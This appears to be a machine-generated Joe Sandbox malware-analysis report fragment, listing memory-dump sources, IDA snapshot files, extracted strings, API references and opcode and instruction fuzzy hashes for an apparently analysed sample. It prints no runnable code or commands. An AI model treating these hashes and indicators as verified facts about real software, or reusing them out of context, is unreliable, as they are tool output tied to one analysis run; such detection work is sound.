                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @A$lPLN$svfZ$IK
                              • API String ID: 0-1806543684
                              • Opcode ID: 2bbd16e11a21fc2fe7e61c28b71e6d3c5f80720bc68c378fb3c920ef912d3448
                              • Instruction ID: a2f1d52840229b1bc4cf99e17469f322f3874c8e367c9860dc350c50ac06d9b9
                              • Opcode Fuzzy Hash: 2bbd16e11a21fc2fe7e61c28b71e6d3c5f80720bc68c378fb3c920ef912d3448
                              • Instruction Fuzzy Hash: 3BC1277264C3848FD3249E6484A536FBBE2EBC2710F1CC92DE4E54B395D7798C099B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$)$IEND
                              • API String ID: 0-588110143
                              • Opcode ID: e98500d7445ce03785705a671e71a6476a4eea02106d160fa340d49795a2f0c1
                              • Instruction ID: 1ccf06ac91c485581c312978ac2921f7ec4e82cbc137887faa246090b30cc595
                              • Opcode Fuzzy Hash: e98500d7445ce03785705a671e71a6476a4eea02106d160fa340d49795a2f0c1
                              • Instruction Fuzzy Hash: D1F1F0B1A087029BE314EF28D85572BBBE0BF94314F044A2DF99697392D774E914CBC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @J$KP$VD
                              • API String ID: 0-3841663987
                              • Opcode ID: ed4fa906bac4b46705986a7b97f8c1e633db71122d9335ee61c773cf614dcd3b
                              • Instruction ID: e92a5a54da254ac6f50890a884245080ed992bdeff439b02f6dcb8b790cb3046
                              • Opcode Fuzzy Hash: ed4fa906bac4b46705986a7b97f8c1e633db71122d9335ee61c773cf614dcd3b
                              • Instruction Fuzzy Hash: 9C914375B08B01AFD720CF68D881BABBBB1FB82310F14452CE5959B781D374A816DB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: PQ$A_$IG
                              • API String ID: 0-2179527320
                              • Opcode ID: b17df48028fb263239721e120457212ee2d1dfb952afef020db3c7a08cb29925
                              • Instruction ID: 3b16068dcb4216eb635ee8d404ae69cc11e51ac30eb9bb936be4efb76bbb221e
                              • Opcode Fuzzy Hash: b17df48028fb263239721e120457212ee2d1dfb952afef020db3c7a08cb29925
                              • Instruction Fuzzy Hash: DE41BCB040C341CAC704DF21D882A6BB7F4FF96758F249A0CE0C68B291D7348586CB6A
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: cC$jC
                              • API String ID: 0-2055910567
                              • Opcode ID: 17a3050317027f6a43e36217a0f6d9bb11a95fa8f4c6dce4df8390fe270d4aec
                              • Instruction ID: 300f3491499516f34108109145340d90a91e6f6d6c2c6ea32e13ad8744557660
                              • Opcode Fuzzy Hash: 17a3050317027f6a43e36217a0f6d9bb11a95fa8f4c6dce4df8390fe270d4aec
                              • Instruction Fuzzy Hash: 7442E136F18215CFDB08CF68D8A16AEB7F2FB89314F1A857DC956A7391D6349901CB80
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: f$
                              • API String ID: 2994545307-508322865
                              • Opcode ID: be3829f453e681bf20f2f6e44fba5c0d2254f3321307209b8b98ddf798df66de
                              • Instruction ID: d0547d04185a1a2220f9c44780bb651d66ec0b46e9567f0a2f3afb6d1b2d4a43
                              • Opcode Fuzzy Hash: be3829f453e681bf20f2f6e44fba5c0d2254f3321307209b8b98ddf798df66de
                              • Instruction Fuzzy Hash: D512D5B060C3419FD714CF28C990AABBBE6EBC5724F148A2CF595972A2D731DC42CB52
                              Strings
                              • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 009B25D2
                              • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 009B2591
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                              • API String ID: 0-2492670020
                              • Opcode ID: 04ffff2ab51f3cd2c5dfd82fd5444df8d8f2835b2324481ee743eeb66cbddaf6
                              • Instruction ID: 64754e15c508fa257690919eb21b10b67399fd7d57808cf94152739b192f894f
                              • Opcode Fuzzy Hash: 04ffff2ab51f3cd2c5dfd82fd5444df8d8f2835b2324481ee743eeb66cbddaf6
                              • Instruction Fuzzy Hash: 7A816B33E186918BCB158F3C8D913E97B929F97330B2DC7A9E8719B3D5C5288D058361
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0$8
                              • API String ID: 0-46163386
                              • Opcode ID: 0e0cd177e5153d903130e8fdb71dcf7fe9a010c74ea12e7fce253420a3cd814f
                              • Instruction ID: a4991222dd48a24ae8cf8b3457ade9eb5a5b907bc158bd862ec5db10e75697db
                              • Opcode Fuzzy Hash: 0e0cd177e5153d903130e8fdb71dcf7fe9a010c74ea12e7fce253420a3cd814f
                              • Instruction Fuzzy Hash: 83A11075A08780DFD320CF28D840B9ABBE1AB99304F15895CE9C897362C775E958DF92
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0$8
                              • API String ID: 0-46163386
                              • Opcode ID: 930ae02f746c835a47171e6fdf5af1fa434a96df8f8acf7b65aad45ccd9486d3
                              • Instruction ID: e2d3767f283b0f8c0ae1d7e3f41540ae62599fe238bdd43012de66c570c274b8
                              • Opcode Fuzzy Hash: 930ae02f746c835a47171e6fdf5af1fa434a96df8f8acf7b65aad45ccd9486d3
                              • Instruction Fuzzy Hash: 1CA12135A0C780DFD320CF28D840B9ABBE1AB99304F15895CE9C897362D775E958DF52
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: efg`$efg`
                              • API String ID: 0-3010568471
                              • Opcode ID: 05e3a0d7e37fd13621b075762810045f87130533ddbc0b0c43599355dfed83d3
                              • Instruction ID: c2dc07c01a69cef35d7d656f091ff8c66c140610684911e04e9bfb6162bc4f11
                              • Opcode Fuzzy Hash: 05e3a0d7e37fd13621b075762810045f87130533ddbc0b0c43599355dfed83d3
                              • Instruction Fuzzy Hash: 0031E232A183608BC328EF50D5A166FB392BFE4300F5A482CD9C627351CE309D0AC7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmp
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: GIOv
                              • API String ID: 0-2521533972
                              • Opcode ID: 63bffd90213478c831eee15bbc8710c92a713d2508ea7fd4d9b5a8b4bff58355
                              • Instruction ID: d9f25a02ff067aaedcd767b8d4ab7abbf2b8e8e1581877de6fbeeb8641d34902
                              • Opcode Fuzzy Hash: 63bffd90213478c831eee15bbc8710c92a713d2508ea7fd4d9b5a8b4bff58355
                              • Instruction Fuzzy Hash: 9E52E7F3A082009FE704AE2DDC8576AF7E9EF98720F1A493DEAC4C3744E53598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: st@
                              • API String ID: 0-3741395493
                              • Opcode ID: 2ed7fb460473013dc367051cbd95b08c9bf202e6c2d24eac8ff653794d792745
                              • Instruction ID: 94fe372d9166c0f0c4009e56212870d84fd313ce60398a79214c2618f8c71f8b
                              • Opcode Fuzzy Hash: 2ed7fb460473013dc367051cbd95b08c9bf202e6c2d24eac8ff653794d792745
                              • Instruction Fuzzy Hash: A0F147B190C3928FD7048F24C85076BBBE6AFD6304F18886DE5D587382D779D90ACB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: =:;8
                              • API String ID: 2994545307-508151936
                              • Opcode ID: c3de869b857e0a9c96004c3c3cca928dbcf0f39eecfd0fc29a96f90a96d4a288
                              • Instruction ID: c49dab4c2137ab3eecaa9f8d2c8f6e3305a9604282045bb312c6eda74f887045
                              • Opcode Fuzzy Hash: c3de869b857e0a9c96004c3c3cca928dbcf0f39eecfd0fc29a96f90a96d4a288
                              • Instruction Fuzzy Hash: 3FD15AB2A583118BD714CE28CC8277BB796EBC6314F19897DD8864B391EE789C06C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: efg`
                              • API String ID: 0-115929991
                              • Opcode ID: 6f82785b33f534e92ad1b799782bcc3f1565fefcf726044bd4a1de8453e96d9d
                              • Instruction ID: a0dfc1723b517272697c7105f161c650d50b7effdb54cedff5e55a6d8d6de931
                              • Opcode Fuzzy Hash: 6f82785b33f534e92ad1b799782bcc3f1565fefcf726044bd4a1de8453e96d9d
                              • Instruction Fuzzy Hash: DEC11371D14215CBCF289F5CDC92ABB73B4FF8A324F19456CE942A72A1E734A901C7A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: _^]\
                              • API String ID: 2994545307-3116432788
                              • Opcode ID: 06c9dc81a7be87f088c0a30dcdb7b4405aa5ce1f22cdaeeab79dc7a1cc7c08e3
                              • Instruction ID: 7ceaa12958eae1db148b13d514c68008098ae9d60be7605f3ec726e0270000b8
                              • Opcode Fuzzy Hash: 06c9dc81a7be87f088c0a30dcdb7b4405aa5ce1f22cdaeeab79dc7a1cc7c08e3
                              • Instruction Fuzzy Hash: A881CE78A083418FC718DF18D490E2AB7E5FF9A750F09856CE9818B366E731EC51CB86
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ,
                              • API String ID: 0-3772416878
                              • Opcode ID: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                              • Instruction ID: 96f9bc70e6905e55166758b25915d37a1ff505af6ff63a8f24a29b14d3bd0d9f
                              • Opcode Fuzzy Hash: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                              • Instruction Fuzzy Hash: 6DB138711083819FD325DF68C89061BFBE0AFA9704F444E6DF5D99B382D631E918CBA6
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: 5|iL
                              • API String ID: 2994545307-1880071150
                              • Opcode ID: 6ca665518c2b346c63630ddb9f06ece0d80d3b6b74c7584bd6ac508c2c9fc035
                              • Instruction ID: 49706ae56ef30e724afe885b4bda7e539a90c01fe1fa72bec930006e3875f4df
                              • Opcode Fuzzy Hash: 6ca665518c2b346c63630ddb9f06ece0d80d3b6b74c7584bd6ac508c2c9fc035
                              • Instruction Fuzzy Hash: 3F71FA32A193108FC7149F2C8D806ABB7A6EBC5734F15866CE994972A5D371DC028BC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: efg`
                              • API String ID: 2994545307-115929991
                              • Opcode ID: f8b415cf5772d4af3eacc4272d5d09c140223cf154e94f23c29b76b82eeb8481
                              • Instruction ID: 707c0ae9838007b350dec9988d6384a9cf9a81c84704ab1229c3838059f22229
                              • Opcode Fuzzy Hash: f8b415cf5772d4af3eacc4272d5d09c140223cf154e94f23c29b76b82eeb8481
                              • Instruction Fuzzy Hash: 00513972A083505BD720FB60DC92BAF7297AFD2314F194428E98967352DF306A0287D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: D
                              • API String ID: 0-2746444292
                              • Opcode ID: 4ac533af672e564a9154bb6b65d62e5fd8ad6cba0e18d4546b8553ca5778423f
                              • Instruction ID: b312f1388134caceae4b72bddc282198b9aa165b033270e4c2e04753903a91e0
                              • Opcode Fuzzy Hash: 4ac533af672e564a9154bb6b65d62e5fd8ad6cba0e18d4546b8553ca5778423f
                              • Instruction Fuzzy Hash: 765120B05593808AE3208F16C86179BBBF1FF91B44F20980CE6E91B394D7B58809CF87
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a9e56e85d3793a0f4e761ff8f8362607d8bf849bd197acd1c0af18c6b7dbfe6d
                              • Instruction ID: 8c898c90cd7ac0c4a1e3eb96ae9dc3c4e0b2bf0eeec7b2699161d1b91e55a82e
                              • Opcode Fuzzy Hash: a9e56e85d3793a0f4e761ff8f8362607d8bf849bd197acd1c0af18c6b7dbfe6d
                              • Instruction Fuzzy Hash: 1642D13160C3118BC725EF68E8806AAF3E2FFC4314F25892DD99687385D739E855CB52
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
